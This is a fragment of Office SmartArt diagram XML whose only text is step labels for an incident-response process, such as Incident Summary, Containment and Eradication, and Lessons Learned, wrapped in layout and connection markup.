    <dgm:cxn modelId="{FFB0CDD4-E06F-4097-8BF5-39CC35C240A5}" type="presOf" srcId="{6A74EABE-2A3C-4366-BD9A-66F3EEDDE2C5}" destId="{E1BF891F-B4F6-470A-A2F1-A5B864054943}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{B9B0BFED-07EC-4802-8021-73261E65DA4A}" type="presParOf" srcId="{48BF1673-48A2-4D1F-96E6-7B8A332CCC37}" destId="{B6A19566-F2FB-48FF-AAF5-9A3CEB2B62FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{70D06FBF-D1EF-4A35-85B6-058E5A6F1F8C}" type="presParOf" srcId="{B6A19566-F2FB-48FF-AAF5-9A3CEB2B62FB}" destId="{F26C90EF-DB7F-4ECA-944E-DCDDB98E59FA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{AF5A37EB-8645-4D23-A879-104222ED61C5}" type="presParOf" srcId="{B6A19566-F2FB-48FF-AAF5-9A3CEB2B62FB}" destId="{3AA4DDCC-E871-49A6-A456-B4B0B1E0A509}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{E65F7DF8-C05F-410A-B96F-B44CA61C424D}" type="presParOf" srcId="{48BF1673-48A2-4D1F-96E6-7B8A332CCC37}" destId="{D6C93EE6-78EB-47C8-9EB8-7764493483DF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{90DF2C0F-27C0-4618-BBA7-6966E10DCFC9}" type="presParOf" srcId="{48BF1673-48A2-4D1F-96E6-7B8A332CCC37}" destId="{F5901858-60A9-4D32-A92E-EC54D2A887BE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{47A1C9FA-D373-45F3-B016-B6D910B7CF62}" type="presParOf" srcId="{F5901858-60A9-4D32-A92E-EC54D2A887BE}" destId="{E1BF891F-B4F6-470A-A2F1-A5B864054943}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrips"/>
    <dgm:cxn modelId="{7D8429F4-18AB-4359-9EB1-C8CEBAF5E930}" type="presParOf" srcId="{F5901858-60A9-4D32-A92E-EC54D2A887BE}" destId="{5DE53E3E-EFB9-48A2-9A24-F1ED189F369C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/PictureStrip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B0542E6-1D39-4297-9A22-FAB3E71E39F7}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31ED4083-A198-4EF7-9D02-6095618C0665}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>1. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Incident Summary</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53AE641B-1E2B-419B-BE81-32C4AD1484CF}" cxnId="{D8A67543-125D-434A-A0CA-33D7518EDC38}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5932087-85A1-4574-A322-B1C59978E7FF}" cxnId="{D8A67543-125D-434A-A0CA-33D7518EDC38}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8544D601-3B58-44F7-8CA8-F4F82416A7AF}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>2. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Containment and Eradication</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0B6D8B9-B553-4F05-80BD-E9FDFBA33342}" cxnId="{2F27E509-A031-4592-991E-8FBA22053087}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A9BE181-F328-4D5D-8FFB-CB66942FEF4F}" cxnId="{2F27E509-A031-4592-991E-8FBA22053087}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFC9CD4B-713B-4F1B-AAB5-2A5668C5EEE0}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>3. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Timeline of Event</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>s</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC27A947-2589-4742-A8EA-074616088ECE}" cxnId="{A56DEBAD-659D-4498-8176-14B4F67BE3BF}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF87AB46-0D88-4328-9EA8-25255B33C0ED}" cxnId="{A56DEBAD-659D-4498-8176-14B4F67BE3BF}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DF35CBB-AD01-4F2C-A37E-2C3251B146B9}" type="pres">
      <dgm:prSet presAssocID="{EB0542E6-1D39-4297-9A22-FAB3E71E39F7}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9FC598B-3221-4484-AA0C-AD9DDE099E17}" type="pres">
      <dgm:prSet presAssocID="{31ED4083-A198-4EF7-9D02-6095618C0665}" presName="Accent1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9164192F-A81A-4DA1-B383-F23B6CC842E3}" type="pres">
      <dgm:prSet presAssocID="{31ED4083-A198-4EF7-9D02-6095618C0665}" presName="Accent" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9AB448F7-6BD0-4BB3-B8F7-DB4C19E9CCA4}" type="pres">
      <dgm:prSet presAssocID="{31ED4083-A198-4EF7-9D02-6095618C0665}" presName="Parent1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A7AF8050-A5AF-4B24-9FBA-B7E6B4A316A9}" type="pres">
      <dgm:prSet presAssocID="{8544D601-3B58-44F7-8CA8-F4F82416A7AF}" presName="Accent2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{07A1B6E6-69FE-41A9-A02D-FC30DA8AA336}" type="pres">
      <dgm:prSet presAssocID="{8544D601-3B58-44F7-8CA8-F4F82416A7AF}" presName="Accent" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E0A07A2-4A81-424A-8D01-C5962348923E}" type="pres">
      <dgm:prSet presAssocID="{8544D601-3B58-44F7-8CA8-F4F82416A7AF}" presName="Parent2" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0FD5E720-2662-439D-A43B-9A02D32B91F5}" type="pres">
      <dgm:prSet presAssocID="{CFC9CD4B-713B-4F1B-AAB5-2A5668C5EEE0}" presName="Accent3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F72DF72C-7704-45A3-BE16-CF86B9BF89F7}" type="pres">
      <dgm:prSet presAssocID="{CFC9CD4B-713B-4F1B-AAB5-2A5668C5EEE0}" presName="Accent" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE2197BD-1972-45F6-BACA-5BBDC619BE5C}" type="pres">
      <dgm:prSet presAssocID="{CFC9CD4B-713B-4F1B-AAB5-2A5668C5EEE0}" presName="Parent3" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2F27E509-A031-4592-991E-8FBA22053087}" srcId="{EB0542E6-1D39-4297-9A22-FAB3E71E39F7}" destId="{8544D601-3B58-44F7-8CA8-F4F82416A7AF}" srcOrd="1" destOrd="0" parTransId="{A0B6D8B9-B553-4F05-80BD-E9FDFBA33342}" sibTransId="{7A9BE181-F328-4D5D-8FFB-CB66942FEF4F}"/>
    <dgm:cxn modelId="{D8A67543-125D-434A-A0CA-33D7518EDC38}" srcId="{EB0542E6-1D39-4297-9A22-FAB3E71E39F7}" destId="{31ED4083-A198-4EF7-9D02-6095618C0665}" srcOrd="0" destOrd="0" parTransId="{53AE641B-1E2B-419B-BE81-32C4AD1484CF}" sibTransId="{A5932087-85A1-4574-A322-B1C59978E7FF}"/>
    <dgm:cxn modelId="{FE9D7068-6576-489C-BADE-8708EB405DCD}" type="presOf" srcId="{CFC9CD4B-713B-4F1B-AAB5-2A5668C5EEE0}" destId="{CE2197BD-1972-45F6-BACA-5BBDC619BE5C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{34FF9E77-DB48-498D-A822-4DA105377A45}" type="presOf" srcId="{31ED4083-A198-4EF7-9D02-6095618C0665}" destId="{9AB448F7-6BD0-4BB3-B8F7-DB4C19E9CCA4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{A56DEBAD-659D-4498-8176-14B4F67BE3BF}" srcId="{EB0542E6-1D39-4297-9A22-FAB3E71E39F7}" destId="{CFC9CD4B-713B-4F1B-AAB5-2A5668C5EEE0}" srcOrd="2" destOrd="0" parTransId="{DC27A947-2589-4742-A8EA-074616088ECE}" sibTransId="{EF87AB46-0D88-4328-9EA8-25255B33C0ED}"/>
    <dgm:cxn modelId="{A306A0B1-7653-4083-9284-23EAE0440766}" type="presOf" srcId="{EB0542E6-1D39-4297-9A22-FAB3E71E39F7}" destId="{1DF35CBB-AD01-4F2C-A37E-2C3251B146B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{1B3ACDE9-7159-4487-8A6F-FE3E1F34F13D}" type="presOf" srcId="{8544D601-3B58-44F7-8CA8-F4F82416A7AF}" destId="{2E0A07A2-4A81-424A-8D01-C5962348923E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{C892C3ED-8601-4194-A4CA-CE81BBD257C1}" type="presParOf" srcId="{1DF35CBB-AD01-4F2C-A37E-2C3251B146B9}" destId="{B9FC598B-3221-4484-AA0C-AD9DDE099E17}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{78EFA035-8F20-47CC-834B-BE973B0269D6}" type="presParOf" srcId="{B9FC598B-3221-4484-AA0C-AD9DDE099E17}" destId="{9164192F-A81A-4DA1-B383-F23B6CC842E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{9092A93B-D6BA-4F3F-9E4E-13163A5FD71E}" type="presParOf" srcId="{1DF35CBB-AD01-4F2C-A37E-2C3251B146B9}" destId="{9AB448F7-6BD0-4BB3-B8F7-DB4C19E9CCA4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{A035781F-5D0E-4CF1-A0B5-14A172C56F53}" type="presParOf" srcId="{1DF35CBB-AD01-4F2C-A37E-2C3251B146B9}" destId="{A7AF8050-A5AF-4B24-9FBA-B7E6B4A316A9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{29B093FA-C1C8-4846-8FC1-B5C685CF22A1}" type="presParOf" srcId="{A7AF8050-A5AF-4B24-9FBA-B7E6B4A316A9}" destId="{07A1B6E6-69FE-41A9-A02D-FC30DA8AA336}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{6486AA68-164F-4F52-BD9A-C6AD58EC340F}" type="presParOf" srcId="{1DF35CBB-AD01-4F2C-A37E-2C3251B146B9}" destId="{2E0A07A2-4A81-424A-8D01-C5962348923E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{0425FD29-8D4A-4B81-BC61-3B064B7C2172}" type="presParOf" srcId="{1DF35CBB-AD01-4F2C-A37E-2C3251B146B9}" destId="{0FD5E720-2662-439D-A43B-9A02D32B91F5}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{166E2370-AAA0-45E5-849C-362A396A7FB7}" type="presParOf" srcId="{0FD5E720-2662-439D-A43B-9A02D32B91F5}" destId="{F72DF72C-7704-45A3-BE16-CF86B9BF89F7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{1775C464-54C0-4928-B361-7AA297FCC714}" type="presParOf" srcId="{1DF35CBB-AD01-4F2C-A37E-2C3251B146B9}" destId="{CE2197BD-1972-45F6-BACA-5BBDC619BE5C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrow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4B6988C-FE2E-46D1-91E5-3579F0C7FAFF}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C927908-660D-4E83-9BCB-D6C8D01C4C6E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>7. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Lessons Learned</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5568404F-614D-44BF-81E6-77C1E19D933C}" cxnId="{0E35131E-94CE-46B9-A198-B58F5F22B6A7}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D900F0E-E83A-4E87-A73A-49F7E86D62E1}" cxnId="{0E35131E-94CE-46B9-A198-B58F5F22B6A7}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E94C4210-DA48-401D-BB88-5D75608B5C03}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>8. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Summary Report</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32ECC09A-81F9-4C15-A316-AC391E871171}" cxnId="{6832DE06-62BE-4205-BC19-BD44DBD3450E}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03B289C9-E23C-4D8C-B6DB-5BAEA106CA8C}" cxnId="{6832DE06-62BE-4205-BC19-BD44DBD3450E}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB60DAAE-0B9B-4572-AAE1-C269E4A8A307}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>9. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Review and Improv</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>e</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B8EB374C-53D3-4F48-BF6C-B7E7E88572CE}" cxnId="{FB93DBD0-1293-4FA3-AE97-74242F75C7A6}" type="parTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D63D9C30-F904-49BC-9406-1E7C98D87F2E}" cxnId="{FB93DBD0-1293-4FA3-AE97-74242F75C7A6}" type="sibTrans">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" type="pres">
      <dgm:prSet presAssocID="{54B6988C-FE2E-46D1-91E5-3579F0C7FAFF}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{921ECB3C-B833-434C-A6B3-52F189022447}" type="pres">
      <dgm:prSet presAssocID="{5C927908-660D-4E83-9BCB-D6C8D01C4C6E}" presName="Accent1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{91EA656E-07C2-40DF-A7F1-F41090EA001C}" type="pres">
      <dgm:prSet presAssocID="{5C927908-660D-4E83-9BCB-D6C8D01C4C6E}" presName="Accent" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8D1CF814-BA1A-406E-93B4-8B06150C918F}" type="pres">
      <dgm:prSet presAssocID="{5C927908-660D-4E83-9BCB-D6C8D01C4C6E}" presName="Parent1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F789A8D7-12A9-4499-AC0B-47999E92C31A}" type="pres">
      <dgm:prSet presAssocID="{E94C4210-DA48-401D-BB88-5D75608B5C03}" presName="Accent2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{34AA66A3-6964-4238-925E-D6F785D69BEF}" type="pres">
      <dgm:prSet presAssocID="{E94C4210-DA48-401D-BB88-5D75608B5C03}" presName="Accent" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3E6A0C06-2611-4B42-AE6E-0156093BF298}" type="pres">
      <dgm:prSet presAssocID="{E94C4210-DA48-401D-BB88-5D75608B5C03}" presName="Parent2" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E3512E39-A082-420E-BC0D-D2E4F9F514D5}" type="pres">
      <dgm:prSet presAssocID="{EB60DAAE-0B9B-4572-AAE1-C269E4A8A307}" presName="Accent3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC51DBE4-5110-4D10-A2D3-FC3E1554470E}" type="pres">
      <dgm:prSet presAssocID="{EB60DAAE-0B9B-4572-AAE1-C269E4A8A307}" presName="Accent" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5F8BD294-06DC-4F14-AFAB-0C573EF8AA6C}" type="pres">
      <dgm:prSet presAssocID="{EB60DAAE-0B9B-4572-AAE1-C269E4A8A307}" presName="Parent3" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{6832DE06-62BE-4205-BC19-BD44DBD3450E}" srcId="{54B6988C-FE2E-46D1-91E5-3579F0C7FAFF}" destId="{E94C4210-DA48-401D-BB88-5D75608B5C03}" srcOrd="1" destOrd="0" parTransId="{32ECC09A-81F9-4C15-A316-AC391E871171}" sibTransId="{03B289C9-E23C-4D8C-B6DB-5BAEA106CA8C}"/>
    <dgm:cxn modelId="{C527C016-9C93-48C3-A37B-E1FB4DCC6C51}" type="presOf" srcId="{5C927908-660D-4E83-9BCB-D6C8D01C4C6E}" destId="{8D1CF814-BA1A-406E-93B4-8B06150C918F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{ECA54719-5917-4812-B190-4DEEE216B490}" type="presOf" srcId="{54B6988C-FE2E-46D1-91E5-3579F0C7FAFF}" destId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{0E35131E-94CE-46B9-A198-B58F5F22B6A7}" srcId="{54B6988C-FE2E-46D1-91E5-3579F0C7FAFF}" destId="{5C927908-660D-4E83-9BCB-D6C8D01C4C6E}" srcOrd="0" destOrd="0" parTransId="{5568404F-614D-44BF-81E6-77C1E19D933C}" sibTransId="{8D900F0E-E83A-4E87-A73A-49F7E86D62E1}"/>
    <dgm:cxn modelId="{072DCA35-6F6C-4E58-8858-46943037D193}" type="presOf" srcId="{E94C4210-DA48-401D-BB88-5D75608B5C03}" destId="{3E6A0C06-2611-4B42-AE6E-0156093BF298}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{9A26A4AF-BA57-43A8-9C02-EAD6979F0EA8}" type="presOf" srcId="{EB60DAAE-0B9B-4572-AAE1-C269E4A8A307}" destId="{5F8BD294-06DC-4F14-AFAB-0C573EF8AA6C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{FB93DBD0-1293-4FA3-AE97-74242F75C7A6}" srcId="{54B6988C-FE2E-46D1-91E5-3579F0C7FAFF}" destId="{EB60DAAE-0B9B-4572-AAE1-C269E4A8A307}" srcOrd="2" destOrd="0" parTransId="{B8EB374C-53D3-4F48-BF6C-B7E7E88572CE}" sibTransId="{D63D9C30-F904-49BC-9406-1E7C98D87F2E}"/>
    <dgm:cxn modelId="{85099744-6170-4606-AF5C-02F10C4F2DC6}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{921ECB3C-B833-434C-A6B3-52F189022447}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{0619E31A-EED7-42F8-9539-E3DBECFC5AF5}" type="presParOf" srcId="{921ECB3C-B833-434C-A6B3-52F189022447}" destId="{91EA656E-07C2-40DF-A7F1-F41090EA001C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{04E8EFB1-2B2D-43AE-862C-1758CCF7FDB4}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{8D1CF814-BA1A-406E-93B4-8B06150C918F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{22D267AB-7FF8-4886-97FA-9A95A8CCBAE6}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{F789A8D7-12A9-4499-AC0B-47999E92C31A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{57080C8C-2A54-493F-B20A-13CD674E6502}" type="presParOf" srcId="{F789A8D7-12A9-4499-AC0B-47999E92C31A}" destId="{34AA66A3-6964-4238-925E-D6F785D69BEF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{A0384C49-F65E-4250-8ECF-8DDF7244C8F6}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{3E6A0C06-2611-4B42-AE6E-0156093BF298}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{B2883ACC-DE8F-456D-977B-5B53AA222F5F}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{E3512E39-A082-420E-BC0D-D2E4F9F514D5}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{EAB71A34-0F8B-4E44-9037-21F6F52B9D42}" type="presParOf" srcId="{E3512E39-A082-420E-BC0D-D2E4F9F514D5}" destId="{DC51DBE4-5110-4D10-A2D3-FC3E1554470E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
